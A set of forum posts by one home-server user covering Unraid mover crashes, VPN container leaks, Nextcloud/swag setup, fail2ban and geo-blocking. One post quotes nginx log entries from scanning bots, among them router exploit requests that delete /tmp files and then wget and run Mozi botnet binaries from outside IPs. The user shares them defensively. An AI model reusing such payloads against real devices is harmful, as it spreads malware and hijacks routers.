ZekerPixels

Everything posted by ZekerPixels

  1. I thought both cache drives were on the motherboard, but I just checked: one cache drive uses the motherboard SATA and the other one is connected to the LSI9211. The disk reported is just the disk it tries to write to; the only consistent factor is the cache. I'm sure the cache is messed up, it now reports 2TB (it is 1TB). Anyway, I need to figure out how I can copy everything from the cache to an external drive or something.
Edit: OK, the cache drive ending in 208 is definitely fucked, but I think I can save most of the data from the other drive. Unfortunately it takes quite some time because it's about 500GB.
EDIT UPDATE: So far the issue is solved. What I did: after discovering that the cache is the problem, crashing the server every time something got written to or read from it, I made a new USB to start fresh, put one of the original cache disks in as an array disk (btrfs) and tried to read the data off it. The first disk immediately crashed the server again, but I could pull all the files from the second disk. After that I basically reinstalled everything the way it was before; I had backups of the dockers and a document with all the changes I made in the past, so it took about 2 hours to set everything back to how it was. I checked the latest files I copied from the cache and all files seem to be unharmed by this situation.
Conclusion: I don't think it was necessary to start from a fresh install, but it didn't take too much time and everything works as it is supposed to.
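For reference, an alternative way to pull data off a single btrfs cache member without reassigning it to the array would be to mount it read-only from the Unraid terminal. A minimal sketch, assuming the old pool member shows up as /dev/sdX1 and a share called "restore" exists on the array (both are placeholders, not my actual setup):
    mkdir -p /mnt/oldcache
    mount -o ro,degraded /dev/sdX1 /mnt/oldcache   # one member of a btrfs raid1 pool needs 'degraded' to mount on its own
    rsync -avh /mnt/oldcache/ /mnt/user/restore/   # copy everything to a share on the array
    umount /mnt/oldcache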
  2. I have the parity disks removed from the array, otherwise I need to cancel the parity check every time; this also excludes anything to do with generating parity when moving to the array.
12:38 turn on syslog and reboot
12:41 start array
12:43 download something to a cache-only folder using a docker
12:45 crashed and automatic reboot
12:48 start array
12:51 start mover
12:51 crashed and automatic reboot
12:55 generate "diagnostics1", disable docker and reboot
12:58 start array (docker and VMs are disabled)
13:00 start mover
13:02 crashed and automatic reboot
13:05 generate "diagnostics2", turn off syslog and get the syslog file
OK, so the syslog contains 3 crashes:
- At the time of the first crash, there is nothing in the syslog.
- At the second crash, also nothing.
- At the third crash, a bunch of BTRFS errors.
So there is at least something going on with the cache, but it could also have been caused by the very frequent crashes.
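A quick way to see whether btrfs itself has recorded problems on the cache pool is from the Unraid terminal; /mnt/cache is the standard cache mount point, the rest is just a sketch:
    btrfs dev stats /mnt/cache       # per-device read/write/corruption error counters
    btrfs scrub start -B /mnt/cache  # verify checksums across the pool and report errors when finished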
  3. As for what the issue could be: it can complete a parity sync without any issues. I would think temperature is fine and power is fine too, because during the parity check there is more CPU utilization and all disks are doing something, which of course requires more power. I don't have an extra PSU or any spares, so I can't really swap out parts to try something. The syslog that I posted should contain two crashes. Anyway, I will make a new one and this time write down the time of events; give me about an hour.
  4. I had no solution or any clue what the issue could be, so I made a fresh 6.9.2 USB, quickly set up my configuration, shares, etc., and it crashes. So I have a fresh Unraid install with the same issue as before. To me that points to a hardware issue, but what could cause it? I removed the other files; these are the new diagnostics and syslog. I'm not sure of the time of the first crash, the second one was at 02:20.
  5. I also thought it could be the RAM, so yes, I have run memtest: with single sticks and with both together, resulting in no errors after 8 passes in each configuration. Also, the server can complete a parity check without any issues; if it were the memory it probably shouldn't be able to do that, because with mover (or any other method of moving from cache to array) it crashes every time within a minute. The only weird line in the syslog is line 169, which is also close to the crash, but it doesn't prove anything because it's also there when it doesn't crash: "ntpd[1758]: kernel reports TIME_ERROR: 0x41: Clock Unsynchronized". I don't know, but /Settings/DateTime shows the correct time.
  6. The array disks are 8TB and 2x 4TB; the cache is 2x 1TB disks. Eris is two different-sized SSDs, 120GB and 240GB, mirrored, so effectively 120GB, and yes, it is using the default btrfs raid1. Appdata, domains and system are all on this pool.
  7. Yes, that would have been a great idea. Updated, this time with the array running.
  8. Hi all, the server has a problem: it crashes every time within a short time after running mover. I have been using this system with 6.9.2 since release and it worked fine before. I have already done the following:
- parity check
- docker safe permissions
- fix common problems
- disabled VMs
- disabled Dockers
- mover, unbalance, krusader
- memtest86, no issues after a couple of passes
With VMs and Dockers disabled it still crashes every time within a minute of invoking mover. I hope you guys have an idea what the issue could be. Anyway, thanks for all the help. ZPx
Updated: https://forums.unraid.net/topic/110753-692-mover-crashes-server/?tab=comments#comment-1010818
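In case anyone wants to reproduce it the way I do: mover can be kicked off from the terminal with the log tailing in the same session, so the last messages before the crash stay on screen. A sketch; as far as I know the script lives at /usr/local/sbin/mover on 6.9.x (older releases ran plain "mover"):
    tail -f /var/log/syslog &     # watch the system log live
    /usr/local/sbin/mover start   # invoke mover manually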
  9. I have never really done anything with GitHub, but I gave it a try with a contribution of the translation for the Recycle Bin. If it doesn't show up or if anything is wrong, let me know.
  10. I set pihole as DNS on my PC and the domain requests are indeed coming from my PC and not from Unraid. I copied all of the indexers you see when you click the list of indexers in the jackett webUI and made them into a blocklist (not reliable, I know, just to test something out). Testing again, all the domains from the jackett UI get a blocked status in pihole, yet testing the indexers still works with those domains blocked, indicating jackett is using the VPN and that the requests the PC makes are completely unnecessary.
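For anyone wanting to repeat that test, the quick-and-dirty way was just the pihole CLI; the domain names below are placeholders, not the actual indexer list:
    pihole -b indexer-one.example.org indexer-two.example.org   # add the test domains to the exact blacklist
    pihole -q indexer-one.example.org                           # confirm pihole matches them against a list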
  11. Quite late here as well, goodnight. One thing to note: it is not only with Firefox. At first I thought I had misconfigured something, but you saw those settings and I'm not doing anything stupid in the config. I'm also not doing anything really advanced, just pihole; lots of people use it, and someone would have noticed if it were a big issue. That's why I suspected the browser at first, and why I tried different browsers and different devices. I'm a bit out of things to try for now, maybe I can come up with something tomorrow. The first time I noticed the domain requests I was playing with Sonarr etc. and thought, hey, that's not right. I can however not directly see the source of the requests in pihole, because they all have 192.168.1.1 (the router) as client, so in pihole I see no difference between the server and the PC. I think I can get around that without too much hassle, will try it tomorrow. It is a bit weird that the browser pings all those domains. I still had the webUI open and just checked: clicking on "test all" pops up in pihole, and so does using "manual search", so that would still originate from the PC. I will set pihole as DNS on my PC and check the origin. I'm sorry for keeping you up at night (never thought I would say that) worrying about your container. Thanks for the support and the effort to make sure there are no issues with the container itself.
  12. It was removed fairly quickly, but I could imagine using a somewhat more difficult password; it sounded a bit like the default welcome123 password company admins tend to use. My jackett log ends with the following, on a fresh install with everything on default settings:
Hosting environment: Production
Content root path: /usr/lib/jackett/Content
Now listening on: http://[::]:9117
Application started. Press Ctrl+C to shut down.
I think the proxy settings binhex referred to are in the webUI, see @binhex's previous post. I discovered something: I mentioned using Firefox on my PC to access the jackett webUI, and the domains show up in pihole. On the same PC I used different browsers to access the jackett webUI, Chrome and Edge, and then it doesn't show up in pihole. Interestingly, doing the same on my phone using Chrome, it does show up in pihole. I fired up a VM, tried Chrome, and it shows up in pihole.
  13. I removed the privoxy container by accident, then also removed the jackett container and deleted the folders in appdata. I reinstalled both using the same settings in the template as before and put the openvpn files back. Once installed, I let it run for a bit and restarted, then stopped both containers and made sure privoxyvpn was started first. A quick check in the console returns the VPN IP. I did not change any other settings (by default the proxy is set to disabled in jackett). Now, on my PC using the Firefox browser, I go to ip:9117 and check pihole, and it doesn't show any of the indexers. Then I click on "add indexer", where you get the big list of indexers. I don't do anything else and check pihole: pihole now lists every domain from 0 to z from jackett. If an indexer is added and I access the webUI, pihole just lists the added indexer.
  14. I didn't want to post a huge picture collection here, so I uploaded them to https://imgur.com/a/qGysAeM. In jackett the proxy is set to disabled, so it should take its network from Unraid, which points to the privoxy container. To be sure it started up the right way, I rebooted the server, started privoxyvpn and waited until it said it was listening on the port before starting jackett.
  15. @binhex Sorry to tag you, but I don't get it. Yes, I have added the ADDITIONAL_PORTS and it works, but I'm questioning whether the pass-through really uses the VPN. Incidentally you mentioned an update, so I forced the update because it might have solved the issue I had, but unfortunately it didn't make a difference. I have pihole set as DNS in the router and I can hide everything from it using the VPN, e.g. with the provided VPN app. But pihole keeps showing domains coming from the passed-through container: e.g. opening the webUI of binhex-jackett gets me a whole list of domains in pihole, and to my mind it shouldn't do that, right? If I do the same for e.g. a Firefox docker, nothing shows up in pihole, as expected. When I open the jackett console and ping a website, it also doesn't show up. I don't understand why opening the webUI of jackett (and maybe others) would be any different. I have also tried it with your other VPN dockers, which leads to the same result (I understand they use the same code, so that is no surprise). I'm only talking about the pass-through; everything to do with torrents is hidden by the VPN. Just to be sure I didn't mess something up, I removed everything, the images and appdata, and started from scratch. Basically I'm following along with SpaceinvaderOne, doing this: https://www.youtube.com/watch?v=znSu_FuKFW0 and in addition adding the port to ADDITIONAL_PORTS, as also described in your VPN FAQ A24. In short (see the sketch below):
- I set up the VPN, credentials and openvpn files; "curl ifconfig.io" shows the VPN IP.
- Added the port to ADDITIONAL_PORTS and passed it through like mbc0 also showed a couple of posts back, because otherwise it doesn't know what to do with it.
- Checked the passed-through container, e.g. "binhex-jackett" with the network set to "--net=container:binhex-privoxyvpn", with "curl ifconfig.io"; it also shows the VPN IP.
- When I access the passed-through container, pihole immediately shows all the domains it accesses.
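To make the setup concrete, this is roughly what the pass-through boils down to at the docker level. A sketch only: the VPN provider settings, credentials, /config volumes and --cap-add=NET_ADMIN that the template adds are left out, and the port numbers match my jackett example:
    # publish jackett's webUI port on the VPN container (ADDITIONAL_PORTS plus a port mapping)
    docker run -d --name=binhex-privoxyvpn \
      -e VPN_ENABLED=yes -e ADDITIONAL_PORTS=9117 \
      -p 8118:8118 -p 9117:9117 \
      binhex/arch-privoxyvpn
    # jackett gets no network of its own; it shares the VPN container's network stack
    docker run -d --name=binhex-jackett \
      --net=container:binhex-privoxyvpn \
      binhex/arch-jackett
    # both should report the VPN endpoint's public IP
    docker exec binhex-privoxyvpn curl -s ifconfig.io
    docker exec binhex-jackett curl -s ifconfig.io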
  16. Hey all, I installed privoxyvpn and also played around with delugevpn and qbittorrentvpn, all of course from binhex. I put the files in the openvpn folder and the VPN works. Now I want to pass it through to another container. Spaceinvaderone has a video about it: I enabled privoxy and entered the proxy information in the web interface of the container. I also tried another method: adding the port of the container I want to pass through to the binhex VPN container, and in the container I want to pass through, setting the network to none and putting "--net=container:binhex-privoxyvpn" in the extra parameters. I think it works: "curl ifconfig.io" in the console and I get the VPN IP. So, here is the thing: I also have pihole running and set as DNS on the router, so I can see the domains that get requested. Let's say I want to pass through jackett (this is a good one to test, because it pings websites I otherwise don't use, so it's easy to spot). With both methods mentioned before, when I open the web interface of the passed-through container (jackett), I can see every domain it wants to access in pihole. In my logic this shouldn't happen because of the VPN connection; am I misconfiguring or misunderstanding something? Thanks.
Edit: I tried entering the proxy information in my browser and checking what my IP is. When I enter the information for PrivoxyVPN it doesn't work; when I try the same for delugevpn it does work (server IP and port 8118).
Edit: removed and deleted everything, tried it again, and it works.
Edit: it worked for a while and then started leaking everything again; trying the update now.
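One more way to test whether traffic actually leaves via the VPN is to point curl at the privoxy port itself (8118 is the container's default privoxy port; SERVER_IP is a placeholder for the Unraid host IP):
    curl ifconfig.io                                 # without the proxy: shows my ISP's IP
    curl --proxy http://SERVER_IP:8118 ifconfig.io   # through privoxy: should show the VPN endpoint's IP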
  17. [SOLVED] Hey all, I'm still trying to set up swag and nextcloud to my liking. I know nextcloud has some brute-force protection (a 25 second timeout) on login attempts, but I want to ban those IPs. So: use fail2ban, since it is already in swag. I found some information about it, and basically you want to pass the relevant nextcloud log to fail2ban in the swag container, and in fail2ban configure a filter for that logfile on which it triggers (see linked post). The problem is what gets written in the access log of nextcloud, "\nextcloud\log\nginx\access.log": if I make a couple of wrong login attempts from an outside IP, I kind of expected something like "login failed", but it doesn't mention anything like that. The nextcloud documentation also shows a filter looking for "Login failed": https://docs.nextcloud.com/server/19/admin_manual/installation/harden_server.html?highlight=fail2ban Thanks.
Edit: wrong log file, I needed nextcloud.log, located in host path 2 that I set in the config. Thank you, Glasti.
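For reference, the filter/jail pair ends up looking roughly like this. A sketch based on the nextcloud hardening docs: the regex is simplified, the values are examples, and the logpath assumes nextcloud.log is mounted into the swag container at /nextcloud/nextcloud.log (adjust to wherever you map it):
    # /config/fail2ban/filter.d/nextcloud.conf (inside the swag container's appdata)
    [Definition]
    failregex = "remoteAddr":"<HOST>".*"message":"Login failed:
    datepattern = ,?\s*"time"\s*:\s*"%%Y-%%m-%%d[T ]%%H:%%M:%%S(%%z)?"

    # appended to /config/fail2ban/jail.local
    [nextcloud]
    enabled  = true
    port     = 80,443
    filter   = nextcloud
    logpath  = /nextcloud/nextcloud.log
    maxretry = 2
    findtime = 86400
    bantime  = 604800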
  18. Hi all, I have set up swag and nextcloud with my own domain; it gets the certificates, and geoip blocking with maxminddb restricts access to my country only. I'm trying to understand what is happening and what gets returned to bots etc., and of course I have some questions I have difficulty finding an answer to.
1. When I VPN to some other country and try to access mydomain, it gets blocked and I'm returned a 444. I think that sounds good. So I was expecting to see the same response to requests from other countries in the log, but that is not the case: for IPs I checked that are from outside the country, I see 200 and 301 returned and not 444. I don't get why it is different.
2. I have set fail2ban to 2 retries, a day for findtime and a week for bantime (aka things should get blocked). (I have some ideas for a better setting, but first I want to see it working on something that isn't me.) I was expecting offenders to show up on a banlist of sorts; maybe I'm stupid, but where can I find what got blocked? Or does it get reset at reboot?
Thanks.
Edit: 1. still don't know; 2. fail2ban is not configured right: https://forums.unraid.net/topic/48383-support-linuxserverio-nextcloud/page/177/?tab=comments#comment-947025
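On question 2: what got banned can be read from fail2ban itself inside the swag container. Assuming the container is named swag and the jail is called nextcloud (both placeholders for whatever your setup uses):
    docker exec -it swag fail2ban-client status            # list the configured jails
    docker exec -it swag fail2ban-client status nextcloud  # currently banned and total banned IPs for one jail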
  19. My device settings look totally different, but to me it looks like you are forwarding 180 to 180 and 4443 to 4443 instead of 80 to 180 and 443 to 4443. The screenshot is very cropped, so maybe it's on there, but it should state ports 80 and 443 somewhere in the port forward. What you can also do is change the IP in the forward to your PC and check whether the ports are indeed open.
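A quick way to check from outside whether the forwards actually reach the server is curl from a machine outside your network (or over mobile data); mydomain.com is a placeholder:
    curl -I http://mydomain.com     # tests the 80 -> 180 forward: expect a response or a redirect to https
    curl -kI https://mydomain.com   # tests the 443 -> 4443 forward: expect the nginx/swag response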
  20. Of course, it's in /appdata/swag/log/nginx/access.log. I understand the bots are searching for something unsecured, and as long as it's secured they don't really do anything. But I'm trying to understand what is happening and I want to be convinced it is secured before actually using it. And I really want to have geo blocking working; it doesn't hurt to use it, and the addresses on https://www.spamhaus.org/statistics/botnet-cc/ get blocked as well. But the kerbynet request I mentioned turns out to be an old router exploit.
  21. Hi all, over the weekend I set up swag and nextcloud following spaceinvaderone's guides (https://scan.nextcloud.com/ gives all A+), and I got everything working using my own domain (nextcloud.mydomain.com). I'm not a specialist, so I'm not very confident about the security. So I decided to let it run for about 20 hours, then check the logs and enter the IPs on abuseipdb.com. I filtered all my own activity out and am left with 158 lines in the nginx log. Here are some examples:
https://www.abuseipdb.com/check/74.120.14.53
https://www.abuseipdb.com/check/180.163.220.5
https://www.abuseipdb.com/check/180.163.220.68
https://www.abuseipdb.com/check/27.115.124.70
https://www.abuseipdb.com/check/192.241.215.11
Next, some of the lines, none of which are from my own IPs. I understand the GET background, logo, etc., but kerbynet and wget from some random IP don't sound good.
GET / HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
POST /GponForm/diag_Form?images/ HTTP/1.1 /tmp/gpon80&ipv=0
POST /boaform/admin/formLogin HTTP/1.1 400 0 -
GET /portal/redlion HTTP/1.1
HEAD http://112.124.42.80:63435/ HTTP/1.1
CONNECT 112.124.42.80:443 HTTP/1.1
HEAD http://110.242.68.4/ HTTP/1.1
CONNECT 110.242.68.4:443 HTTP/1.1
POST /HNAP1/ HTTP/1.0
\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\x11\xDFJ\x5CN\x8F\xA0\x89[\x9A\x84i=\x8A\x8FA\xEB\x98\xE3\xDB\xFDQ\xD1Iw\xFD\xED
HEAD /robots.txt HTTP/1.0
GET /login HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
GET /actuator/health HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
OPTIONS / HTTP/1.1
HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1
HEAD / HTTP/1.0
GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1
@\x00\x00\x00y0\x12\xD9\x9E9Q\x90\x8A\xED\xEE`\xCC\xB3\xD6| \x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
GET /hudson HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1
GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
GET / HTTP/2.0 http://baidu.com/
GET /login HTTP/2.0 http://baidu.com/
GET / HTTP/2.0
GET /login HTTP/2.0
GET /apps/files_rightclick/css/app.css?v=46c85d58-8 HTTP/2.0
GET /core/css/guest.css?v=c3182750-8 HTTP/2.0
GET /apps/files_videoplayer/js/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_fileinfo.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_client.js?v=c3182750-8 HTTP/2.0
GET /apps/files_sharing/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /apps/files_pdfviewer/js/files_pdfviewer-public.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/script.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/files.js?v=c3182750-8 HTTP/2.0
GET /apps/theming/js/theming.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/login.js?v=c3182750-8 HTTP/2.0
GET /js/core/merged-template-prepend.js?v=c3182750-8 HTTP/2.0
GET /core/js/oc.js?v=c3182750 HTTP/2.0
GET /apps/theming/styles?v=8 HTTP/2.0
GET /apps/theming/image/logo?useSvg=1&v=8 HTTP/2.0
GET /apps/accessibility/css/user-a82fd95db10ff25dfad39f07372ebe37 HTTP/2.0
GET /core/img/actions/confirm-white.svg?v=2 HTTP/2.0
GET /core/img/loading-dark.gif HTTP/2.0
GET /core/img/actions/toggle.svg HTTP/2.0
GET /apps/theming/image/logo?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/image/background?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/favicon?v=8 HTTP/1.1
GET /csrftoken HTTP/2.0
Are there some obvious things I forgot to do? Considering the IP locations, geo blocking wouldn't be a bad idea. I don't leave the country much, so blocking roughly the whole world except 2 or 3 countries would probably be an option. Thanks.
Edit: found something on geo blocking: https://technicalramblings.com/blog/blocking-countries-with-geolite2-using-the-letsencrypt-docker-container/ and of course I'm running into issues, I'm missing something very obvious.
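The geo blocking in that guide boils down to an nginx geoip2 lookup plus an allow/deny map. Roughly like this, as a sketch only: the mmdb path and the country codes are examples, and the exact file names in the swag appdata may differ:
    # in the http block: look up the visitor's country code
    geoip2 /config/geoip2db/GeoLite2-Country.mmdb {
        $geoip2_country_code country iso_code;
    }
    map $geoip2_country_code $allowed_country {
        default no;
        NL yes;   # allow only these country codes
        BE yes;
    }
    # in the server/location block of the proxy conf: drop everyone else without a response
    if ($allowed_country = no) {
        return 444;
    }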
  22. [SOLVED] Hi all, I'm trying to set up nextcloud and swag so I can access it from my own domain. I can't find why I don't get it working; it's probably something very simple and hopefully someone can point me in the right direction. When I try to access nextcloud in the browser via nextcloud.mydomain.com, I get:
Internal Server Error. The server encountered an internal error and was unable to complete your request. Please contact the server administrator if this error reappears multiple times, please include the technical details below in your report. More details can be found in the webserver log.
This is the error I get from the nextcloud container, by clicking on "log" on the docker page:
PHP Fatal error: Uncaught Error: Call to a member function getLogger() on null in /config/www/nextcloud/cron.php:162 Stack trace: }
How I set it up is of course according to the spaceinvaderone video. For setting up swag, I have the custom proxy network and port forwards, and I entered my own domain. This is working: the log showed getting a certificate and ends on "server ready". I made the subdomain.conf without changes from the sample, because I will also be using nextcloud.mydomain.com. Setting up nextcloud works until the point where you access it via your own domain (at this point clicking on webUI also gives the same error). So I suspect the config.php file; this is also the part which is different from the video, because of swag instead of LetsEncrypt. This is the nextcloud config.php:
<?php
$CONFIG = array (
  'memcache.local' => '\\OC\\Memcache\\APCu',
  'datadirectory' => '/data',
  'instanceid' => '###',
  'passwordsalt' => '###',
  'secret' => '###',
  'trusted_domains' =>
  'trusted_proxies' => ['swag'],
  array (
    0 => '10.10.10.10:444',
    1 => 'nextcloud.mydomain.com',
  ),
  'overwrite.cli.url' => 'https://nextcloud.mydomain.com/',
  'overwritehost' => 'nextcloud.mydomain.com',
  'overwriteprotocol' => 'https',
  'dbtype' => 'mysql',
  'version' => '20.0.6.1',
  'dbname' => 'db name from mariadb',
  'dbhost' => '10.10.10.10:3306',
  'dbport' => '',
  'dbtableprefix' => 'oc_',
  'mysql.utf8mb4' => true,
  'dbuser' => 'user name from mariadb',
  'dbpassword' => 'password',
  'installed' => true,
);
Thanks.
Edit: I found a post on a Russian forum that mentions the same error, pointing to a syntax error in the nextcloud config file. I copied and modified the file using nano in the terminal; that should be fine, right? I will try notepad++ to see if it makes a difference.
Edit: Omg, I'm stupid. Look where I placed the trusted_proxies entry, it fucked up the trusted_domains array.
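For anyone landing here with the same error: the fix is simply moving the trusted_proxies line out of the middle of the trusted_domains definition, so each option is its own entry. The relevant part of config.php should look roughly like this (same placeholder values as above):
    'trusted_domains' =>
    array (
      0 => '10.10.10.10:444',
      1 => 'nextcloud.mydomain.com',
    ),
    'trusted_proxies' => ['swag'],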